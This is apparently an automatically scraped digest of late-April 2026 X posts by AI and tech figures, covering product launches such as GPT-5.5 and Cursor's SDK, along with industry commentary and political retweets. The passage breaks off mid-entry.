nice\n[原文链接](https://x.com/sama/status/2049903925311267311)\n\n**[2026-04-30T05:56:16+00:00]**\n> RT by @sama: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a wi…\n[原文链接](https://x.com/sama/status/2049729530059960571)\n\n**[2026-04-30T04:59:15+00:00]**\n> alignment failure\n[原文链接](https://x.com/sama/status/2049715178611380317)\n\n**[2026-04-30T04:46:56+00:00]**\n> we're starting rollout of GPT-5.5-Cyber, a frontier cybersecurity model, to critical cyber defenders in the next few days. we will work with the entire ecosystem and the government to figure out trus…\n[原文链接](https://x.com/sama/status/2049712078836170843)\n\n**[2026-04-30T03:27:12+00:00]**\n> R to @sama: openai.com/index/where-the-g…\n[原文链接](https://x.com/sama/status/2049692014586048973)\n\n**[2026-04-30T03:27:08+00:00]**\n> goblinblog dropped\n[原文链接](https://x.com/sama/status/2049691999444639872)\n\n**[2026-04-30T03:18:22+00:00]**\n> RT by @sama: This GPT Image 2 prompt is going insanely viral right now. “Redraw the attached image in the most clumsy, scribbly, and utterly pathetic way possible. Use a white background, and make it…\n[原文链接](https://x.com/sama/status/2049689793118998717)\n\n**[2026-04-30T00:55:24+00:00]**\n> R to @sama: we will have it at our SF HQ and pay for plane tickets & hotel for people who aren't local. we'll close the link tomorrow at 5:55 pm.\n[原文链接](https://x.com/sama/status/2049653814463168638)\n\n**[2026-04-30T00:55:23+00:00]**\n> GPT-5.5 is going to have a party for itself. it chose 5/5 at 5:55 pm for the date and time. if you'd like to come, let us know here: https://luma.com/5.5 codex will help the team pick people from the…\n[原文链接](https://x.com/sama/status/2049653810558353746)\n\n**[2026-04-29T14:19:33+00:00]**\n> R to @sama: i meant a goblin moment, sorry\n[原文链接](https://x.com/sama/status/2049493797114126484)\n\n**[2026-04-29T14:18:48+00:00]**\n> feels like codex is having a chatgpt moment\n[原文链接](https://x.com/sama/status/2049493609028923826)\n\n**[2026-04-29T14:14:59+00:00]**\n> i love that the team does stuff like this\n[原文链接](https://x.com/sama/status/2049492646792757552)\n\n**[2026-04-29T13:15:47+00:00]**\n> RT by @sama: terminal has been my primary interface to my computer for almost two decades. now it’s the Codex app.\n[原文链接](https://x.com/sama/status/2049477747882254775)\n\n**[2026-04-29T02:31:21+00:00]**\n> R to @sama: at this point @ajambrosino is mogmogging enjoy the next few updates\n[原文链接](https://x.com/sama/status/2049315574120055054)\n\n**[2026-04-29T02:27:13+00:00]**\n> Image\n[原文链接](https://x.com/sama/status/2049314532892475791)\n\n---\n\n### ✅ @DarioAmodei — Dario Amodei(0 条)\n\n---\n\n### ✅ @AravSrinivas — Aravind Srinivas(7 条)\n\n**[2026-05-01T00:18:54+00:00]**\n> RT by @AravSrinivas: $AAPL CFO: “Leading AI developers like Perplexity are choosing Mac as their preferred platform to build enterprise-grade AI assistants that power autonomous agents and boost work…\n[原文链接](https://x.com/AravSrinivas/status/2050007015616135365)\n\n**[2026-04-28T16:05:11+00:00]**\n> RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad. Comet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet al…\n[原文链接](https://x.com/AravSrinivas/status/2049157990604025896)\n\n**[2026-04-28T15:38:49+00:00]**\n> R to @AravSrinivas: reddit.com/r/GeminiAI/commen…\n[原文链接](https://x.com/AravSrinivas/status/2049151356985040934)\n\n**[2026-04-28T15:38:28+00:00]**\n> A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes.\n[原文链接](https://x.com/AravSrinivas/status/2049151268606894310)\n\n**[2026-04-24T21:24:24+00:00]**\n> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr…\n[原文链接](https://x.com/AravSrinivas/status/2047788775468908840)\n\n**[2026-04-24T19:03:21+00:00]**\n> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y…\n[原文链接](https://x.com/AravSrinivas/status/2047753276888854595)\n\n**[2026-04-24T18:44:19+00:00]**\n> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.\n[原文链接](https://x.com/AravSrinivas/status/2047748486767272243)\n\n---\n\n### ✅ @AndrewYNg — Andrew Ng(2 条)\n\n**[2026-04-30T16:21:35+00:00]**\n> Pinned: How we prompt AI is very different in 2026 than 2022 when ChatGPT came out. I'm teaching a new course, AI Prompting for Everyone, to help you become an AI power user — whatever your current s…\n[原文链接](https://x.com/AndrewYNg/status/2049886895530967534)\n\n**[2026-04-27T15:58:13+00:00]**\n> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to…\n[原文链接](https://x.com/AndrewYNg/status/2048793852702757151)\n\n---\n\n### ✅ @cursor_ai — Cursor(14 条)\n\n**[2026-04-30T18:58:07+00:00]**\n> R to @cursor_ai: We’re continuing to improve the runtime, harness, and models powering Cursor Security Review for a strong out-of-the-box experience. Security agents draw from your existing usage poo…\n[原文链接](https://x.com/cursor_ai/status/2049926287439929475)\n\n**[2026-04-30T18:58:06+00:00]**\n> R to @cursor_ai: Customize these Cursor-managed security agents to match your team’s requirements. Adjust triggers, add your own instructions, give them custom tooling, and choose how outputs are sha…\n[原文链接](https://x.com/cursor_ai/status/2049926285518848093)\n\n**[2026-04-30T18:58:06+00:00]**\n> Cursor Security Review is now available for Teams and Enterprise plans. Run two types of always-on agents: 1. Security Reviewer checks every PR for vulnerabilities and leaves comments. 2. Vulnerabili…\n[原文链接](https://x.com/cursor_ai/status/2049926283061035254)\n\n**[2026-04-30T17:19:22+00:00]**\n> Our agent harness makes models inside Cursor faster, smarter, and more token-efficient. Here's how we test improvements to the harness, monitor and repair degradations, and customize it for different…\n[原文链接](https://x.com/cursor_ai/status/2049901436918436249)\n\n**[2026-04-29T14:43:43+00:00]**\n> R to @cursor_ai: Customers like Rippling, Notion, C3 AI, and Faire are using the Cursor SDK to build custom background agents, take bugs from ticket to merge-ready PR, and maintain self-healing codeb…\n[原文链接](https://x.com/cursor_ai/status/2049499876388454903)\n\n**[2026-04-29T14:43:42+00:00]**\n> R to @cursor_ai: We've open-sourced a few starter projects for you to build on: a coding agent CLI, a prototyping tool, and an agent-powered kanban board. Use Cursor to customize them for your use ca…\n[原文链接](https://x.com/cursor_ai/status/2049499874043830389)\n\n**[2026-04-29T14:43:42+00:00]**\n> R to @cursor_ai: With the Cursor SDK, you can run agents locally or deploy them in our cloud.\n[原文链接](https://x.com/cursor_ai/status/2049499871980200082)\n\n**[2026-04-29T14:43:40+00:00]**\n> We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor. Run agents from CI/CD pipelines, create automations for end-to-end workflows, or…\n[原文链接](https://x.com/cursor_ai/status/2049499866217185492)\n\n**[2026-04-24T19:48:34+00:00]**\n> R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download\n[原文链接](https://x.com/cursor_ai/status/2047764656165646786)\n\n**[2026-04-24T19:48:33+00:00]**\n> R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes. A single agent session can now target a reusable workspace made of multiple folders.\n[原文链接](https://x.com/cursor_ai/status/2047764654760632725)\n\n**[2026-04-24T19:48:33+00:00]**\n> R to @cursor_ai: Another way to parallelize work is with new and improved worktrees in the agents window. Run isolated tasks in the background across different branches. When you're ready to test cha…\n[原文链接](https://x.com/cursor_ai/status/2047764652977958938)\n\n**[2026-04-24T19:48:33+00:00]**\n> Introducing /multitask in the new Cursor 3 interface. Cursor can now run async subagents to parallelize your requests instead of adding them to the queue. For already queued messages, you can ask Cur…\n[原文链接](https://x.com/cursor_ai/status/2047764651363180839)\n\n**[2026-04-24T18:28:47+00:00]**\n> R to @cursor_ai: More on CursorBench: http://cursor.com/blog/cursorbench\n[原文链接](https://x.com/cursor_ai/status/2047744580280561948)\n\n**[2026-04-24T18:28:47+00:00]**\n> GPT-5.5 is now available in Cursor! It's currently the top model on CursorBench at 72.8%. We've partnered with OpenAI to offer it for 50% off through May 2.\n[原文链接](https://x.com/cursor_ai/status/2047744579127185843)\n\n---\n\n### ✅ @ylecun — Yann LeCun(20 条)\n\n**[2026-04-30T11:02:45+00:00]**\n> RT by @ylecun: ✨🧠 Tribe v2, our latest model of human brain responses to sound, sight and language can now be (partly) explored on your phone📱: ▶️demo: https://aidemos.atmeta.com/tribev2/ 📄paper: htt…\n[原文链接](https://x.com/ylecun/status/2049806660001022372)\n\n**[2026-04-30T06:58:24+00:00]**\n> RT by @ylecun: These folks are trying to ban open source. They're looking to take away your freedom to choose. They're also looking to take away the rights of businesses like Cursor to fine tune and …\n[原文链接](https://x.com/ylecun/status/2049745165665853742)\n\n**[2026-04-30T00:05:29+00:00]**\n> Trump's war on science.\n[原文链接](https://x.com/ylecun/status/2049641252287607241)\n\n**[2026-04-29T22:48:11+00:00]**\n> RT by @ylecun: Trump’s FCC chair, Brendan Carr, says he plans to punish and potentially revoke broadcast licenses for TV networks critical of the Trump administration: “I’d be surprised if we don’t g…\n[原文链接](https://x.com/ylecun/status/2049621796736180438)\n\n**[2026-04-29T20:43:08+00:00]**\n> RT by @ylecun: Science is how we’ve cured diseases and how we just sent four humans around the Moon. It’s a big reason why we’re the greatest country on Earth, but firing the National Science Board s…\n[原文链接](https://x.com/ylecun/status/2049590329871904801)\n\n**[2026-04-29T18:50:10+00:00]**\n> RT by @ylecun: This is what an impending midterm disaster looks like for Republicans. https://trib.al/eLV1GmR\n[原文链接](https://x.com/ylecun/status/2049561899189055901)\n\n**[2026-04-29T11:49:39+00:00]**\n> RT by @ylecun: \"A decade ago, AI was supposed to replace radiologists. Today, radiologists make more than $500,000 per year, and their employment continues to grow, see chart below. Reading scans is …\n[原文链接](https://x.com/ylecun/status/2049456071278747804)\n\n**[2026-04-29T00:50:33+00:00]**\n> RT by @ylecun: - Comey indicted for tweeting a number. - Trump FCC threatens ABC's broadcast license. - Trump defacing more govt institutions with his name and picture. - Trump's kids cashing in on h…\n[原文链接](https://x.com/ylecun/status/2049290206923382906)\n\n**[2026-04-28T23:38:23+00:00]**\n> RT by @ylecun: \"World models\" has a technical meaning - the transition model/dynamics model from Bellman/Kalman in the context of MDPs/ state space approach to control theory ~ 1960. I gave a talk on…\n[原文链接](https://x.com/ylecun/status/2049272044504936685)\n\n**[2026-04-28T21:36:28+00:00]**\n> RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 ! As my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers: - EB-JEPA https://github…\n[原文链接](https://x.com/ylecun/status/2049241361266684288)\n\n**[2026-04-28T01:05:42+00:00]**\n> RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc In just one year, it has be…\n[原文链接](https://x.com/ylecun/status/2048931628995510596)\n\n**[2026-04-27T21:38:46+00:00]**\n> RT by @ylecun: “Calling Trump a fascist incites political violence” Here’s a compilation of Trump calling his opponents fascists\n[原文链接](https://x.com/ylecun/status/2048879552022130882)\n\n**[2026-04-27T21:06:29+00:00]**\n> RT by @ylecun: He is right\n[原文链接](https://x.com/ylecun/status/2048871429681148028)\n\n**[2026-04-27T14:59:33+00:00]**\n> RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 ye…\n[原文链接](https://x.com/ylecun/status/2048779086168838610)\n\n**[2026-04-27T12:27:04+00:00]**\n> RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the ne…\n[原文链接](https://x.com/ylecun/status/2048740712556933170)\n\n**[2026-04-27T10:23:22+00:00]**\n> RT by @ylecun: AI has had one safest technology roll-outs in history. Read that again, because it's a fact. It's used by billions with a tiny fraction of a percent of actual problems. And yet it's se…\n[原文链接](https://x.com/ylecun/status/2048709585360367651)\n\n**[2026-04-27T06:49:24+00:00]**\n> RT by @ylecun: Image\n[原文链接](https://x.com/ylecun/status/2048655735412650355)\n\n**[2026-04-26T23:40:02+00:00]**\n> RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor au…\n[原文链接](https://x.com/ylecun/status/2048547683112046771)\n\n**[2026-04-26T19:19:22+00:00]**\n> RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. The result, predictably, is…\n[原文链接](https://x.com/ylecun/status/2048482084646240560)\n\n**[2026-04-26T16:08:11+00:00]**\n> RT by @ylecun: What if I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? Hell no, right? But the answer is actuall…\n[原文链接](https://x.com/ylecun/status/2048433973177573559)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(5 条)\n\n**[2026-04-29T16:00:49+00:00]**\n> RT by @JeffDean: You can now ask Gemini to create Docs, Sheets, Slides, PDFs, and more directly in your chat. No more copying, pasting, or reformatting, just prompt and download. Available globally f…\n[原文链接](https://x.com/JeffDean/status/2049519281600373159)\n\n**[2026-04-28T20:16:21+00:00]**\n> Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below. Translate is one of my favorite Google products because it brings us all closer together! I've been involved wi…\n[原文链接](https://x.com/JeffDean/status/2049221200321380805)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://x.com/JeffDean/status/2048759102390899142)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://x.com/JeffDean/status/2048351736037826877)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://x.com/JeffDean/status/2047665074471387456)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(3 条)\n\n**[2026-04-29T13:07:26+00:00]**\n> Github and critical work are becoming incompatible\n[原文链接](https://x.com/soumithchintala/status/2049475649157374146)\n\n**[2026-04-28T13:25:24+00:00]**\n> Test of Time LLM from some legends...pretty fun!\n[原文链接](https://x.com/soumithchintala/status/2049117783447785523)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://x.com/soumithchintala/status/2048756358820827564)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(17 条)\n\n**[2026-05-01T01:13:13+00:00]**\n> I dunno. The competition is really tight. But Zuck certainly a top contender! Who’s your “favorite”?\n[原文链接](https://x.com/GaryMarcus/status/2050020685733564459)\n\n**[2026-05-01T01:11:09+00:00]**\n> Most evil person in AI\n[原文链接](https://x.com/GaryMarcus/status/2050020164612104604)\n\n**[2026-05-01T01:09:21+00:00]**\n> Once again IP thieves accusing other IP thieves of IP thievery! The nerve!\n[原文链接](https://x.com/GaryMarcus/status/2050019713409814672)\n\n**[2026-05-01T00:27:22+00:00]**\n> Tokenmaxxing is stupid. Change my mind?\n[原文链接](https://x.com/GaryMarcus/status/2050009144846119068)\n\n**[2026-04-30T23:46:40+00:00]**\n> wow. incredible.\n[原文链接](https://x.com/GaryMarcus/status/2049998902452183488)\n\n**[2026-04-30T23:36:38+00:00]**\n> this is … odd. the whole problem with agentic code is that people wind up with hard to debug redundancies, security holes, deleted databases, etc., which is exactly why you need roadmaps and code rev…\n[原文链接](https://x.com/GaryMarcus/status/2049996377678057717)\n\n**[2026-04-30T21:13:28+00:00]**\n> RT by @GaryMarcus: Cuando sucede un problema en un puesto automatizado por la IA... ¿Quién es el responsable?\n[原文链接](https://x.com/GaryMarcus/status/2049960351198839176)\n\n**[2026-04-30T20:59:29+00:00]**\n> Who is accountable? the latest from @marketoonist\n[原文链接](https://x.com/GaryMarcus/status/2049956829019447683)\n\n**[2026-04-30T20:43:38+00:00]**\n> Dear @elonmusk, If you still genuinely care about AI safety, you can’t let the Trump administration leave the AI industry almost entirely unregulated. You just can’t. - Gary\n[原文链接](https://x.com/GaryMarcus/status/2049952842010751095)\n\n**[2026-04-30T19:56:39+00:00]**\n> somebody feels very rejected 🤷‍♂️\n[原文链接](https://x.com/GaryMarcus/status/2049941019077247438)\n\n**[2026-04-30T17:49:50+00:00]**\n> John Oliver @LastWeekTonight slays a pile of greedy tech CEOs, gives props to @GaryMarcus 😻 The tides are changing, and other folks like @wendyweeww are speaking out in support.\n[原文链接](https://x.com/GaryMarcus/status/2049909103129251864)\n\n**[2026-04-30T17:32:47+00:00]**\n> OpenAI’s lawyer plays dirty. Why I am not surprised?\n[原文链接](https://x.com/GaryMarcus/status/2049904811165008099)\n\n**[2026-04-30T17:23:08+00:00]**\n> Wild graph from @Evident_HQ:\n[原文链接](https://x.com/GaryMarcus/status/2049902385808744558)\n\n**[2026-04-30T16:35:11+00:00]**\n> would be very surprising if he didn’t. let’s see who can spot them first.\n[原文链接](https://x.com/GaryMarcus/status/2049890318200570310)\n\n**[2026-04-30T15:59:15+00:00]**\n> RT by @GaryMarcus: One underdiscussed part of the Google-DOD deal is how it blindsided the company’s own employees. One told @cogcelia that senior management had repeatedly insisted Google wouldn’t c…\n[原文链接](https://x.com/GaryMarcus/status/2049881272990789710)\n\n**[2026-04-30T15:31:09+00:00]**\n> RT by @GaryMarcus: Big Tech’s $700 billion spending on AI this year is called the ‘greatest capital misallocation in history’ https://trib.al/qUQIbrJ\n[原文链接](https://x.com/GaryMarcus/status/2049874202983870910)\n\n**[2026-04-29T17:01:15+00:00]**\n> RT by @GaryMarcus: \"The more you look at chatbots, the more you realize that they were rushed to market with very little consideration for the consequences,\" https://trib.al/StQPjzT\n[原文链接](https://x.com/GaryMarcus/status/2049534487852179834)\n\n---\n\n### ⚠️ @elonmusk — Elon Musk(获取失败)\n\n- 错误: snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-04-30T09:50:40+00:00]**\n> View of Stockholm.\n[原文链接](https://x.com/paulg/status/2049788518730240192)\n\n**[2026-04-30T08:41:53+00:00]**\n> RT by @paulg: 3 years ago we were 50 people at the @ycombinator event in Stockholm. Last night 1350 showed up. The job to become Silicon Valley of Europe is still up for grabs and Stockholm is in the…\n[原文链接](https://x.com/paulg/status/2049771206283313434)\n\n**[2026-04-30T05:56:16+00:00]**\n> RT by @paulg: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a w…\n[原文链接](https://x.com/paulg/status/2049729530059960571)\n\n**[2026-04-30T05:09:44+00:00]**\n> This graph shows one of the many reasons the good old days were not so good. Even as late as 1870, women were losing 2 out of 5 of their children.\n[原文链接](https://x.com/paulg/status/2049717818996756711)\n\n**[2026-04-30T04:53:12+00:00]**\n> RT by @paulg: Anthropic shouldn’t do this and doesn’t have to Would be great if it stopped\n[原文链接](https://x.com/paulg/status/2049713659103129810)\n\n**[2026-04-29T21:06:56+00:00]**\n> Jessica and I have been talking about how earnest Swedish founders seem. Obviously it's news to no one that Swedes would be earnest. But I don't think they themselves realize how valuable this qualit…\n[原文链接](https://x.com/paulg/status/2049596317244997710)\n\n**[2026-04-29T20:42:58+00:00]**\n> This sounds like hyperbole, but it's not. Measured by the effect you could have on the world, CTO of the Arc Institute could very well be the most important technical role in biology.\n[原文链接](https://x.com/paulg/status/2049590286599221578)\n\n**[2026-04-29T20:37:10+00:00]**\n> It's astounding how fast Vanta has been growing. And for the best reason too: they made a really good product.\n[原文链接](https://x.com/paulg/status/2049588825135964389)\n\n**[2026-04-29T14:01:21+00:00]**\n> RT by @paulg: Demis Hassabis (@demishassabis) has had one of the most extraordinary careers in tech. He started as a chess prodigy and video game designer at 17 before getting a PhD in neuroscience a…\n[原文链接](https://x.com/paulg/status/2049489217953374689)\n\n**[2026-04-29T12:25:16+00:00]**\n> R to @paulg: Jessica today. I told her if she went to Stockholm people would address her in Swedish. Someone did in the first hour we were there.\n[原文链接](https://x.com/paulg/status/2049465035362046224)\n\n**[2026-04-29T12:16:40+00:00]**\n> Just went to visit Legora. Most impressive startup I've been to visit in years. They're going to surpass Harvey in 2027. After that their only potential rivals will be the model companies. And if eve…\n[原文链接](https://x.com/paulg/status/2049462871260639448)\n\n**[2026-04-29T12:02:19+00:00]**\n> \"They're all wearing solid colors. People here don't wear patterns. This is my kind of place.\" — Jessica on Stockholm\n[原文链接](https://x.com/paulg/status/2049459258907898272)\n\n**[2026-04-29T09:24:58+00:00]**\n> RT by @paulg: I think Scott Aaronson's previous blog posts were abundantly clear already, but well... here we have it.\n[原文链接](https://x.com/paulg/status/2049419661855338641)\n\n**[2026-04-29T09:13:21+00:00]**\n> R to @paulg: Why do I assume his successors will be more principled? Partly because almost everyone is, even in politics. And partly because if they aren't, it won't matter much who's president, beca…\n[原文链接](https://x.com/paulg/status/2049416736806449649)\n\n**[2026-04-29T09:11:10+00:00]**\n> R to @paulg: He'll leave the opposite legacy. His more principled successors will have a harder time getting things done, because of the walls everyone has built to protect against Trump's overreach.\n[原文链接](https://x.com/paulg/status/2049416188568949159)\n\n**[2026-04-29T09:09:13+00:00]**\n> Trump's bullying only works (and only temporarily at that) because he's taking advantage of the high-trust customs and relationships established by more principled predecessors.\n[原文链接](https://x.com/paulg/status/2049415696694587729)\n\n**[2026-04-29T03:42:31+00:00]**\n> RT by @paulg: MIT student asked a question earlier today that a lot of young founders are quietly wondering about: \"Won’t the frontier labs just do everything?\" Yes it's true that OAI/Ant are shippin…\n[原文链接](https://x.com/paulg/status/2049333482271260710)\n\n**[2026-04-29T03:29:10+00:00]**\n> RT by @paulg: What do the smartest kids in the world do when they grow up? I did the largest study of ~18,000 International Olympiad medalists (IMO, IOI and IPhO) over the last 25yrs, arguably the sh…\n[原文链接](https://x.com/paulg/status/2049330123464393084)\n\n**[2026-04-28T20:39:11+00:00]**\n> We're in Stockholm. You know how there are some places where you think \"Nice place to visit, but I wouldn't want to live there\"? Stockholm is the kind of place that makes you want to live there.\n[原文链接](https://x.com/paulg/status/2049226946471489602)\n\n**[2026-04-28T20:35:56+00:00]**\n> There are some real bombshells in this one.\n[原文链接](https://x.com/paulg/status/2049226128603172949)\n\n---\n\n### ✅ @naval — Naval Ravikant(12 条)\n\n**[2026-04-30T01:46:40+00:00]**\n> Follow @navalpodcast. We are posting more clips there.\n[原文链接](https://x.com/naval/status/2049666715798430109)\n\n**[2026-04-29T07:34:24+00:00]**\n> RT by @naval: Elon Musk avait dit un truc qui m'avait marqué sur l'allocation de ressources. En substance : passé un certain niveau de richesse, l'argent n'est plus de la consommation, c'est de l'all…\n[原文链接](https://x.com/naval/status/2049391838646182234)\n\n**[2026-04-29T06:01:47+00:00]**\n> \"Savings Tax.\"\n[原文链接](https://x.com/naval/status/2049368528445403351)\n\n**[2026-04-29T04:45:11+00:00]**\n> R to @naval: Apple: http://apple.co/4cF5VWZ Spotify: http://open.spotify.com/episode/5C1aTaJwlpkGC7Lj0cqDrx YouTube: http://youtu.be/hTdSU7q5WCo Transcript: http://nav.al/code — Presented by AngelLis…\n[原文链接](https://x.com/naval/status/2049349252112089553)\n\n**[2026-04-29T04:45:10+00:00]**\n> New podcast on vibe coding - A Return to Code. A Return to Coding 00:20 The Personal App Store 03:17 Vibe Coding Is a Video Game with Real-World Rewards 06:22 Pure Software Is Uninvestable 10:33 A Pl…\n[原文链接](https://x.com/naval/status/2049349249905951175)\n\n**[2026-04-28T04:41:00+00:00]**\n> RT by @naval: Unfortunately, those in power in Sacramento seem blind to second order effects. We are now in a situation where this wealth tax is very likely to pass. This means founders who control t…\n[原文链接](https://x.com/naval/status/2048985810842865914)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://x.com/naval/status/2047645157080658335)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://x.com/naval/status/2047550896670908809)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://x.com/naval/status/2047546920747307466)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://x.com/naval/status/2047520212787015748)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://x.com/naval/status/2047519250433421604)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://x.com/naval/status/2047510419565420779)\n\n---\n\n### ✅ @pmarca — Marc Andreessen(20 条)\n\n**[2026-05-01T01:01:26+00:00]**\n> We’re finally signing. https://www.bizjournals.com/sanjose/news/2017/06/24/vcs-rally-around-decency-pledge-after-silicon.html\n[原文链接](https://x.com/pmarca/status/2050017717592510568)\n\n**[2026-05-01T00:22:01+00:00]**\n> Apocalypses (apocalypsii?) are fungible.\n[原文链接](https://x.com/pmarca/status/2050007800882122833)\n\n**[2026-05-01T00:09:03+00:00]**\n> Concerning. https://nypost.com/2026/04/30/business/inside-the-ai-doom-machine-and-who-is-benefiting-from-it/\n[原文链接](https://x.com/pmarca/status/2050004538216886756)\n\n**[2026-04-30T21:28:45+00:00]**\n> Valid.\n[原文链接](https://x.com/pmarca/status/2049964195954020800)\n\n**[2026-04-30T18:34:10+00:00]**\n> Co-sign.\n[原文链接](https://x.com/pmarca/status/2049920259432513702)\n\n**[2026-04-30T17:45:25+00:00]**\n> RT by @pmarca: It’s time to demystify Mythos. Mythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). OpenAI’s GPT-5.5-cyber c…\n[原文链接](https://x.com/pmarca/status/2049907993588769006)\n\n**[2026-04-30T01:56:13+00:00]**\n> Ahhhhh\n[原文链接](https://x.com/pmarca/status/2049669117683314870)\n\n**[2026-04-30T01:37:31+00:00]**\n> Self recommending.\n[原文链接](https://x.com/pmarca/status/2049664413226172560)\n\n**[2026-04-30T00:43:31+00:00]**\n> Mm hmm.\n[原文链接](https://x.com/pmarca/status/2049650824675234090)\n\n**[2026-04-29T22:19:35+00:00]**\n> Thread 🤯\n[原文链接](https://x.com/pmarca/status/2049614600807780717)\n\n**[2026-04-29T22:07:33+00:00]**\n> RT by @pmarca: After days of painstaking “research,” I finally figured out how “hostile foreign forces” infiltrated China: It all began when a German named Karl decided to “lie flat” to escape the re…\n[原文链接](https://x.com/pmarca/status/2049611573598298249)\n\n**[2026-04-29T22:04:46+00:00]**\n> But then...\n[原文链接](https://x.com/pmarca/status/2049610871580885368)\n\n**[2026-04-29T22:03:00+00:00]**\n> 😍\n[原文链接](https://x.com/pmarca/status/2049610427341078931)\n\n**[2026-04-29T22:01:32+00:00]**\n> Overheard in Silicon Valley: \"Rebranding to 'forward deployed engineer' from 'consultant' one of the great all time recruiting whammies.\"\n[原文链接](https://x.com/pmarca/status/2049610057302831190)\n\n**[2026-04-29T20:58:26+00:00]**\n> Golden retriever energy! Co-sign.\n[原文链接](https://x.com/pmarca/status/2049594178347340210)\n\n**[2026-04-28T20:26:28+00:00]**\n> Image\n[原文链接](https://x.com/pmarca/status/2049223746368483370)\n\n**[2026-04-28T20:20:22+00:00]**\n> “YouTube videos about AI, but with no soyface”\n[原文链接](https://x.com/pmarca/status/2049222212008206717)\n\n**[2026-04-28T18:27:56+00:00]**\n> The AI we thought we’d get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it …\n[原文链接](https://x.com/pmarca/status/2049193915249574141)\n\n**[2026-04-28T18:25:59+00:00]**\n> Many such cases?\n[原文链接](https://x.com/pmarca/status/2049193427120603173)\n\n**[2026-04-28T18:06:36+00:00]**\n> Asking AI to ask questions is hugely underrated.\n[原文链接](https://x.com/pmarca/status/2049188549342138449)\n\n---\n\n### ✅ @david_tiantian — David Tian Wang(0 条)\n\n---\n\n### ✅ @morganhousel — Morgan Housel(0 条)\n\n---\n\n### ✅ @eladgil — Elad Gil(10 条)\n\n**[2026-04-30T18:31:25+00:00]**\n> 🔥\n[原文链接](https://x.com/eladgil/status/2049919569134047726)\n\n**[2026-04-30T17:48:18+00:00]**\n> RT by @eladgil: Your honour, I think this should be allowed.\n[原文链接](https://x.com/eladgil/status/2049908719782334528)\n\n**[2026-04-29T23:00:58+00:00]**\n> What is best Italian in SF?\n[原文链接](https://x.com/eladgil/status/2049625013310120188)\n\n**[2026-04-29T22:41:38+00:00]**\n> Really enjoyed this conversation w @tferriss\n[原文链接](https://x.com/eladgil/status/2049620148123001125)\n\n**[2026-04-29T22:21:54+00:00]**\n> RT by @eladgil: NEW podcast episode is up! Elad Gil (@eladgil), Consigliere to Empire Builders — How to Spot Billion-Dollar 